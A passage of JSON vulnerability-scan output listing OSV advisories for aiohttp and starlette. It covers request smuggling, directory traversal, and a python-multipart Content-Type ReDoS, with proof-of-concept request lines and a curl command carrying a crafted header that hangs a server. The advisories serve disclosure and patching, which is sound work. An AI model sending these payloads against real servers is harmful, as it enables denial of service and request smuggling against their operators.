                  "url": "https://github.com/aio-libs/aiohttp/commit/28335525d1eac015a7e7584137678cbb6ff19397"
                },
                {
                  "type": "PACKAGE",
                  "url": "https://github.com/aio-libs/aiohttp"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2EXRGTN2WG7VZLUZ7WOXU5GQJKCPPHKP"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NWEI6NIHZ3G7DURDZVMRK7ZEFC2BTD3U"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZIVBMPEY7WWOFMC3CWXFBRQPFECV4SW3"
                }
              ],
              "database_specific": {
                "cwe_ids": [
                  "CWE-79"
                ],
                "github_reviewed": true,
                "github_reviewed_at": "2024-04-18T13:45:21Z",
                "nvd_published_at": "2024-04-18T15:15:29Z",
                "severity": "MODERATE"
              }
            },
            {
              "modified": "2024-02-18T05:33:44Z",
              "published": "2024-01-29T22:30:07Z",
              "schema_version": "1.6.0",
              "id": "GHSA-8qpw-xqxj-h4r2",
              "aliases": [
                "CVE-2024-23829",
                "PYSEC-2024-26"
              ],
              "summary": "aiohttp's HTTP parser (the python one, not llhttp) still overly lenient about separators",
              "details": "### Summary\nSecurity-sensitive parts of the *Python HTTP parser* retained minor differences in allowable character sets, that must trigger error handling to robustly match frame boundaries of proxies in order to protect against injection of additional requests. Additionally, validation could trigger exceptions that were not handled consistently with processing of other malformed input.\n\n### Details\nThese problems are rooted in pattern matching protocol elements, previously improved by PR #3235 and GHSA-gfw2-4jvh-wgfg:\n\n1. The expression `HTTP/(\\d).(\\d)` lacked another backslash to clarify that the separator should be a literal dot, not just *any* Unicode code point (result: `HTTP/(\\d)\\.(\\d)`).\n\n2. The HTTP version was permitting Unicode digits, where only ASCII digits are standards-compliant.\n\n3. Distinct regular expressions for validating HTTP Method and Header field names were used - though both should (at least) apply the common restrictions of rfc9110 `token`.\n\n### PoC\n`GET / HTTP/1ö1`\n`GET / HTTP/1.𝟙`\n`GET/: HTTP/1.1`\n`Content-Encoding?: chunked`\n\n### Impact\nPrimarily concerns running an aiohttp server without llhttp:\n 1. **behind a proxy**: Being more lenient than internet standards require could, depending on deployment environment, assist in request smuggling.\n 2. **directly accessible** or exposed behind proxies relaying malformed input: the unhandled exception could cause excessive resource consumption on the application server and/or its logging facilities.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/pull/8074/files",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "aiohttp",
                    "purl": "pkg:pypi/aiohttp"
                  },
                  "ranges": [
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "3.9.2"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "0.1",
                    "0.10.0",
                    "0.10.1",
                    "0.10.2",
                    "0.11.0",
                    "0.12.0",
                    "0.13.0",
                    "0.13.1",
                    "0.14.0",
                    "0.14.1",
                    "0.14.2",
                    "0.14.3",
                    "0.14.4",
                    "0.15.0",
                    "0.15.1",
                    "0.15.2",
                    "0.15.3",
                    "0.16.0",
                    "0.16.1",
                    "0.16.2",
                    "0.16.3",
                    "0.16.4",
                    "0.16.5",
                    "0.16.6",
                    "0.17.0",
                    "0.17.1",
                    "0.17.2",
                    "0.17.3",
                    "0.17.4",
                    "0.18.0",
                    "0.18.1",
                    "0.18.2",
                    "0.18.3",
                    "0.18.4",
                    "0.19.0",
                    "0.2",
                    "0.20.0",
                    "0.20.1",
                    "0.20.2",
                    "0.21.0",
                    "0.21.1",
                    "0.21.2",
                    "0.21.4",
                    "0.21.5",
                    "0.21.6",
                    "0.22.0",
                    "0.22.0a0",
                    "0.22.0b0",
                    "0.22.0b1",
                    "0.22.0b2",
                    "0.22.0b3",
                    "0.22.0b4",
                    "0.22.0b5",
                    "0.22.0b6",
                    "0.22.1",
                    "0.22.2",
                    "0.22.3",
                    "0.22.4",
                    "0.22.5",
                    "0.3",
                    "0.4",
                    "0.4.1",
                    "0.4.2",
                    "0.4.3",
                    "0.4.4",
                    "0.5.0",
                    "0.6.0",
                    "0.6.1",
                    "0.6.2",
                    "0.6.3",
                    "0.6.4",
                    "0.6.5",
                    "0.7.0",
                    "0.7.1",
                    "0.7.2",
                    "0.7.3",
                    "0.8.0",
                    "0.8.1",
                    "0.8.2",
                    "0.8.3",
                    "0.8.4",
                    "0.9.0",
                    "0.9.1",
                    "0.9.2",
                    "0.9.3",
                    "1.0.0",
                    "1.0.1",
                    "1.0.2",
                    "1.0.3",
                    "1.0.5",
                    "1.1.0",
                    "1.1.1",
                    "1.1.2",
                    "1.1.3",
                    "1.1.4",
                    "1.1.5",
                    "1.1.6",
                    "1.2.0",
                    "1.3.0",
                    "1.3.1",
                    "1.3.2",
                    "1.3.3",
                    "1.3.4",
                    "1.3.5",
                    "2.0.0",
                    "2.0.0rc1",
                    "2.0.1",
                    "2.0.2",
                    "2.0.3",
                    "2.0.4",
                    "2.0.5",
                    "2.0.6",
                    "2.0.7",
                    "2.1.0",
                    "2.2.0",
                    "2.2.1",
                    "2.2.2",
                    "2.2.3",
                    "2.2.4",
                    "2.2.5",
                    "2.3.0",
                    "2.3.0a1",
                    "2.3.0a2",
                    "2.3.0a3",
                    "2.3.0a4",
                    "2.3.1",
                    "2.3.10",
                    "2.3.1a1",
                    "2.3.2",
                    "2.3.2b2",
                    "2.3.2b3",
                    "2.3.3",
                    "2.3.4",
                    "2.3.5",
                    "2.3.6",
                    "2.3.7",
                    "2.3.8",
                    "2.3.9",
                    "3.0.0",
                    "3.0.0b0",
                    "3.0.0b1",
                    "3.0.0b2",
                    "3.0.0b3",
                    "3.0.0b4",
                    "3.0.1",
                    "3.0.2",
                    "3.0.3",
                    "3.0.4",
                    "3.0.5",
                    "3.0.6",
                    "3.0.7",
                    "3.0.8",
                    "3.0.9",
                    "3.1.0",
                    "3.1.1",
                    "3.1.2",
                    "3.1.3",
                    "3.2.0",
                    "3.2.1",
                    "3.3.0",
                    "3.3.0a0",
                    "3.3.1",
                    "3.3.2",
                    "3.3.2a0",
                    "3.4.0",
                    "3.4.0a0",
                    "3.4.0a3",
                    "3.4.0b1",
                    "3.4.0b2",
                    "3.4.1",
                    "3.4.2",
                    "3.4.3",
                    "3.4.4",
                    "3.5.0",
                    "3.5.0a1",
                    "3.5.0b1",
                    "3.5.0b2",
                    "3.5.0b3",
                    "3.5.1",
                    "3.5.2",
                    "3.5.3",
                    "3.5.4",
                    "3.6.0",
                    "3.6.0a0",
                    "3.6.0a1",
                    "3.6.0a11",
                    "3.6.0a12",
                    "3.6.0a2",
                    "3.6.0a3",
                    "3.6.0a4",
                    "3.6.0a5",
                    "3.6.0a6",
                    "3.6.0a7",
                    "3.6.0a8",
                    "3.6.0a9",
                    "3.6.0b0",
                    "3.6.1",
                    "3.6.1b3",
                    "3.6.1b4",
                    "3.6.2",
                    "3.6.2a0",
                    "3.6.2a1",
                    "3.6.2a2",
                    "3.6.3",
                    "3.7.0",
                    "3.7.0b0",
                    "3.7.0b1",
                    "3.7.1",
                    "3.7.2",
                    "3.7.3",
                    "3.7.4",
                    "3.7.4.post0",
                    "3.8.0",
                    "3.8.0a7",
                    "3.8.0b0",
                    "3.8.1",
                    "3.8.2",
                    "3.8.3",
                    "3.8.4",
                    "3.8.5",
                    "3.8.6",
                    "3.9.0",
                    "3.9.0b0",
                    "3.9.0b1",
                    "3.9.0rc0",
                    "3.9.1"
                  ],
                  "database_specific": {
                    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-8qpw-xqxj-h4r2/GHSA-8qpw-xqxj-h4r2.json"
                  }
                }
              ],
              "severity": [
                {
                  "type": "CVSS_V3",
                  "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                }
              ],
              "references": [
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8qpw-xqxj-h4r2"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-gfw2-4jvh-wgfg"
                },
                {
                  "type": "ADVISORY",
                  "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23829"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/pull/3235"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/pull/8074"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/pull/8074/files"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/aio-libs/aiohttp/commit/33ccdfb0a12690af5bb49bda2319ec0907fa7827"
                },
                {
                  "type": "PACKAGE",
                  "url": "https://github.com/aio-libs/aiohttp"
                },
                {
                  "type": "WEB",
                  "url": "https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2024-26.yaml"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD"
                },
                {
                  "type": "WEB",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7"
                }
              ],
              "database_specific": {
                "cwe_ids": [
                  "CWE-444"
                ],
                "github_reviewed": true,
                "github_reviewed_at": "2024-01-29T22:30:07Z",
                "nvd_published_at": "2024-01-29T23:15:08Z",
                "severity": "MODERATE"
              }
            },
            {
              "modified": "2024-02-05T20:43:19Z",
              "published": "2024-01-29T23:15:00Z",
              "schema_version": "1.6.0",
              "id": "PYSEC-2024-24",
              "aliases": [
                "CVE-2024-23334",
                "GHSA-5h86-8mv2-jq9f"
              ],
              "details": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.  Disabling follow_symlinks and using a reverse proxy are encouraged mitigations.  Version 3.9.2 fixes this issue.",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "aiohttp",
                    "purl": "pkg:pypi/aiohttp"
                  },
                  "ranges": [
                    {
                      "type": "GIT",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "1c335944d6a8b1298baf179b7c0b3069f10c514b"
                        }
                      ],
                      "repo": "https://github.com/aio-libs/aiohttp"
                    },
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "1.0.5"
                        },
                        {
                          "fixed": "3.9.2"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "1.0.5",
                    "1.1.0",
                    "1.1.1",
                    "1.1.2",
                    "1.1.3",
                    "1.1.4",
                    "1.1.5",
                    "1.1.6",
                    "1.2.0",
                    "1.3.0",
                    "1.3.1",
                    "1.3.2",
                    "1.3.3",
                    "1.3.4",
                    "1.3.5",
                    "2.0.0",
                    "2.0.0rc1",
                    "2.0.1",
                    "2.0.2",
                    "2.0.3",
                    "2.0.4",
                    "2.0.5",
                    "2.0.6",
                    "2.0.7",
                    "2.1.0",
                    "2.2.0",
                    "2.2.1",
                    "2.2.2",
                    "2.2.3",
                    "2.2.4",
                    "2.2.5",
                    "2.3.0",
                    "2.3.0a1",
                    "2.3.0a2",
                    "2.3.0a3",
                    "2.3.0a4",
                    "2.3.1",
                    "2.3.10",
                    "2.3.1a1",
                    "2.3.2",
                    "2.3.2b2",
                    "2.3.2b3",
                    "2.3.3",
                    "2.3.4",
                    "2.3.5",
                    "2.3.6",
                    "2.3.7",
                    "2.3.8",
                    "2.3.9",
                    "3.0.0",
                    "3.0.0b0",
                    "3.0.0b1",
                    "3.0.0b2",
                    "3.0.0b3",
                    "3.0.0b4",
                    "3.0.1",
                    "3.0.2",
                    "3.0.3",
                    "3.0.4",
                    "3.0.5",
                    "3.0.6",
                    "3.0.7",
                    "3.0.8",
                    "3.0.9",
                    "3.1.0",
                    "3.1.1",
                    "3.1.2",
                    "3.1.3",
                    "3.2.0",
                    "3.2.1",
                    "3.3.0",
                    "3.3.0a0",
                    "3.3.1",
                    "3.3.2",
                    "3.3.2a0",
                    "3.4.0",
                    "3.4.0a0",
                    "3.4.0a3",
                    "3.4.0b1",
                    "3.4.0b2",
                    "3.4.1",
                    "3.4.2",
                    "3.4.3",
                    "3.4.4",
                    "3.5.0",
                    "3.5.0a1",
                    "3.5.0b1",
                    "3.5.0b2",
                    "3.5.0b3",
                    "3.5.1",
                    "3.5.2",
                    "3.5.3",
                    "3.5.4",
                    "3.6.0",
                    "3.6.0a0",
                    "3.6.0a1",
                    "3.6.0a11",
                    "3.6.0a12",
                    "3.6.0a2",
                    "3.6.0a3",
                    "3.6.0a4",
                    "3.6.0a5",
                    "3.6.0a6",
                    "3.6.0a7",
                    "3.6.0a8",
                    "3.6.0a9",
                    "3.6.0b0",
                    "3.6.1",
                    "3.6.1b3",
                    "3.6.1b4",
                    "3.6.2",
                    "3.6.2a0",
                    "3.6.2a1",
                    "3.6.2a2",
                    "3.6.3",
                    "3.7.0",
                    "3.7.0b0",
                    "3.7.0b1",
                    "3.7.1",
                    "3.7.2",
                    "3.7.3",
                    "3.7.4",
                    "3.7.4.post0",
                    "3.8.0",
                    "3.8.0a7",
                    "3.8.0b0",
                    "3.8.1",
                    "3.8.2",
                    "3.8.3",
                    "3.8.4",
                    "3.8.5",
                    "3.8.6",
                    "3.9.0",
                    "3.9.0b0",
                    "3.9.0b1",
                    "3.9.0rc0",
                    "3.9.1"
                  ],
                  "database_specific": {
                    "source": "https://github.com/pypa/advisory-database/blob/main/vulns/aiohttp/PYSEC-2024-24.yaml"
                  }
                }
              ],
              "severity": [
                {
                  "type": "CVSS_V3",
                  "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                }
              ],
              "references": [
                {
                  "type": "ADVISORY",
                  "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f"
                },
                {
                  "type": "FIX",
                  "url": "https://github.com/aio-libs/aiohttp/pull/8079"
                },
                {
                  "type": "FIX",
                  "url": "https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b"
                },
                {
                  "type": "ARTICLE",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/"
                }
              ]
            },
            {
              "modified": "2024-02-06T20:41:46Z",
              "published": "2024-01-29T23:15:00Z",
              "schema_version": "1.6.0",
              "id": "PYSEC-2024-26",
              "aliases": [
                "CVE-2024-23829",
                "GHSA-8qpw-xqxj-h4r2"
              ],
              "details": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Security-sensitive parts of the Python HTTP parser retained minor differences in allowable character sets, that must trigger error handling to robustly match frame boundaries of proxies in order to protect against injection of additional requests. Additionally, validation could trigger exceptions that were not handled consistently with processing of other malformed input.  Being more lenient than internet standards require could, depending on deployment environment, assist in request smuggling. The unhandled exception could cause excessive resource consumption on the application server and/or its logging facilities. This vulnerability exists due to an incomplete fix for CVE-2023-47627. Version 3.9.2 fixes this vulnerability.",
              "affected": [
                {
                  "package": {
                    "ecosystem": "PyPI",
                    "name": "aiohttp",
                    "purl": "pkg:pypi/aiohttp"
                  },
                  "ranges": [
                    {
                      "type": "GIT",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "33ccdfb0a12690af5bb49bda2319ec0907fa7827"
                        }
                      ],
                      "repo": "https://github.com/aio-libs/aiohttp"
                    },
                    {
                      "type": "ECOSYSTEM",
                      "events": [
                        {
                          "introduced": "0"
                        },
                        {
                          "fixed": "3.9.2"
                        }
                      ]
                    }
                  ],
                  "versions": [
                    "0.1",
                    "0.10.0",
                    "0.10.1",
                    "0.10.2",
                    "0.11.0",
                    "0.12.0",
                    "0.13.0",
                    "0.13.1",
                    "0.14.0",
                    "0.14.1",
                    "0.14.2",
                    "0.14.3",
                    "0.14.4",
                    "0.15.0",
                    "0.15.1",
                    "0.15.2",
                    "0.15.3",
                    "0.16.0",
                    "0.16.1",
                    "0.16.2",
                    "0.16.3",
                    "0.16.4",
                    "0.16.5",
                    "0.16.6",
                    "0.17.0",
                    "0.17.1",
                    "0.17.2",
                    "0.17.3",
                    "0.17.4",
                    "0.18.0",
                    "0.18.1",
                    "0.18.2",
                    "0.18.3",
                    "0.18.4",
                    "0.19.0",
                    "0.2",
                    "0.20.0",
                    "0.20.1",
                    "0.20.2",
                    "0.21.0",
                    "0.21.1",
                    "0.21.2",
                    "0.21.4",
                    "0.21.5",
                    "0.21.6",
                    "0.22.0",
                    "0.22.0a0",
                    "0.22.0b0",
                    "0.22.0b1",
                    "0.22.0b2",
                    "0.22.0b3",
                    "0.22.0b4",
                    "0.22.0b5",
                    "0.22.0b6",
                    "0.22.1",
                    "0.22.2",
                    "0.22.3",
                    "0.22.4",
                    "0.22.5",
                    "0.3",
                    "0.4",
                    "0.4.1",
                    "0.4.2",
                    "0.4.3",
                    "0.4.4",
                    "0.5.0",
                    "0.6.0",
                    "0.6.1",
                    "0.6.2",
                    "0.6.3",
                    "0.6.4",
                    "0.6.5",
                    "0.7.0",
                    "0.7.1",
                    "0.7.2",
                    "0.7.3",
                    "0.8.0",
                    "0.8.1",
                    "0.8.2",
                    "0.8.3",
                    "0.8.4",
                    "0.9.0",
                    "0.9.1",
                    "0.9.2",
                    "0.9.3",
                    "1.0.0",
                    "1.0.1",
                    "1.0.2",
                    "1.0.3",
                    "1.0.5",
                    "1.1.0",
                    "1.1.1",
                    "1.1.2",
                    "1.1.3",
                    "1.1.4",
                    "1.1.5",
                    "1.1.6",
                    "1.2.0",
                    "1.3.0",
                    "1.3.1",
                    "1.3.2",
                    "1.3.3",
                    "1.3.4",
                    "1.3.5",
                    "2.0.0",
                    "2.0.0rc1",
                    "2.0.1",
                    "2.0.2",
                    "2.0.3",
                    "2.0.4",
                    "2.0.5",
                    "2.0.6",
                    "2.0.7",
                    "2.1.0",
                    "2.2.0",
                    "2.2.1",
                    "2.2.2",
                    "2.2.3",
                    "2.2.4",
                    "2.2.5",
                    "2.3.0",
                    "2.3.0a1",
                    "2.3.0a2",
                    "2.3.0a3",
                    "2.3.0a4",
                    "2.3.1",
                    "2.3.10",
                    "2.3.1a1",
                    "2.3.2",
                    "2.3.2b2",
                    "2.3.2b3",
                    "2.3.3",
                    "2.3.4",
                    "2.3.5",
                    "2.3.6",
                    "2.3.7",
                    "2.3.8",
                    "2.3.9",
                    "3.0.0",
                    "3.0.0b0",
                    "3.0.0b1",
                    "3.0.0b2",
                    "3.0.0b3",
                    "3.0.0b4",
                    "3.0.1",
                    "3.0.2",
                    "3.0.3",
                    "3.0.4",
                    "3.0.5",
                    "3.0.6",
                    "3.0.7",
                    "3.0.8",
                    "3.0.9",
                    "3.1.0",
                    "3.1.1",
                    "3.1.2",
                    "3.1.3",
                    "3.2.0",
                    "3.2.1",
                    "3.3.0",
                    "3.3.0a0",
                    "3.3.1",
                    "3.3.2",
                    "3.3.2a0",
                    "3.4.0",
                    "3.4.0a0",
                    "3.4.0a3",
                    "3.4.0b1",
                    "3.4.0b2",
                    "3.4.1",
                    "3.4.2",
                    "3.4.3",
                    "3.4.4",
                    "3.5.0",
                    "3.5.0a1",
                    "3.5.0b1",
                    "3.5.0b2",
                    "3.5.0b3",
                    "3.5.1",
                    "3.5.2",
                    "3.5.3",
                    "3.5.4",
                    "3.6.0",
                    "3.6.0a0",
                    "3.6.0a1",
                    "3.6.0a11",
                    "3.6.0a12",
                    "3.6.0a2",
                    "3.6.0a3",
                    "3.6.0a4",
                    "3.6.0a5",
                    "3.6.0a6",
                    "3.6.0a7",
                    "3.6.0a8",
                    "3.6.0a9",
                    "3.6.0b0",
                    "3.6.1",
                    "3.6.1b3",
                    "3.6.1b4",
                    "3.6.2",
                    "3.6.2a0",
                    "3.6.2a1",
                    "3.6.2a2",
                    "3.6.3",
                    "3.7.0",
                    "3.7.0b0",
                    "3.7.0b1",
                    "3.7.1",
                    "3.7.2",
                    "3.7.3",
                    "3.7.4",
                    "3.7.4.post0",
                    "3.8.0",
                    "3.8.0a7",
                    "3.8.0b0",
                    "3.8.1",
                    "3.8.2",
                    "3.8.3",
                    "3.8.4",
                    "3.8.5",
                    "3.8.6",
                    "3.9.0",
                    "3.9.0b0",
                    "3.9.0b1",
                    "3.9.0rc0",
                    "3.9.1"
                  ],
                  "database_specific": {
                    "source": "https://github.com/pypa/advisory-database/blob/main/vulns/aiohttp/PYSEC-2024-26.yaml"
                  }
                }
              ],
              "severity": [
                {
                  "type": "CVSS_V3",
                  "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                }
              ],
              "references": [
                {
                  "type": "ADVISORY",
                  "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8qpw-xqxj-h4r2"
                },
                {
                  "type": "FIX",
                  "url": "https://github.com/aio-libs/aiohttp/pull/8074"
                },
                {
                  "type": "FIX",
                  "url": "https://github.com/aio-libs/aiohttp/commit/33ccdfb0a12690af5bb49bda2319ec0907fa7827"
                },
                {
                  "type": "ARTICLE",
                  "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/"
                }
              ]
            }
          ],
          "groups": [
            {
              "ids": [
                "GHSA-5h86-8mv2-jq9f",
                "PYSEC-2024-24"
              ],
              "aliases": [
                "CVE-2024-23334",
                "GHSA-5h86-8mv2-jq9f",
                "PYSEC-2024-24"
              ],
              "max_severity": "7.5"
            },
            {
              "ids": [
                "GHSA-5m98-qgg9-wh84"
              ],
              "aliases": [
                "CVE-2024-30251",
                "GHSA-5m98-qgg9-wh84"
              ],
              "max_severity": "7.5"
            },
            {
              "ids": [
                "GHSA-7gpw-8wmc-pm8g"
              ],
              "aliases": [
                "CVE-2024-27306",
                "GHSA-7gpw-8wmc-pm8g"
              ],
              "max_severity": "6.1"
            },
            {
              "ids": [
                "GHSA-8qpw-xqxj-h4r2",
                "PYSEC-2024-26"
              ],
              "aliases": [
                "CVE-2024-23829",
                "GHSA-8qpw-xqxj-h4r2",
                "PYSEC-2024-26"
              ],
              "max_severity": "6.5"
            }
          ]
        },
        {
          "package": {
            "name": "starlette",
            "version": "0.34.0",
            "ecosystem": "PyPI"
          },
          "vulnerabilities": [
            {
              "modified": "2024-02-17T06:26:40Z",
              "published": "2024-02-12T17:28:12Z",
              "schema_version": "1.6.0",
              "id": "GHSA-2jv5-9r88-3w3p",
              "aliases": [
                "CVE-2024-24762",
                "GHSA-93gm-qmq6-w238",
                "GHSA-qf9m-vfgh-m389",
                "PYSEC-2024-38"
              ],
              "summary": "python-multipart vulnerable to Content-Type Header ReDoS",
              "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a simple WSGI application, that just parses the `Content-Type`, and run it with `python main.py`:\n\n```Python\n# main.py\nfrom wsgiref.simple_server import make_server\nfrom wsgiref.validate import validator\n\nfrom multipart.multipart import parse_options_header\n\n\ndef simple_app(environ, start_response):\n    _, _ = parse_options_header(environ[\"CONTENT_TYPE\"])\n\n    start_response(\"200 OK\", [(\"Content-type\", \"text/plain\")])\n    return [b\"Ok\"]\n\n\nhttpd = make_server(\"\", 8123, validator(simple_app))\nprint(\"Serving on port 8123...\")\nhttpd.serve_forever()\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8123/'\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal report to FastAPI\u003c/summary\u003e\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n    username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n    return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n    return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n    return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py 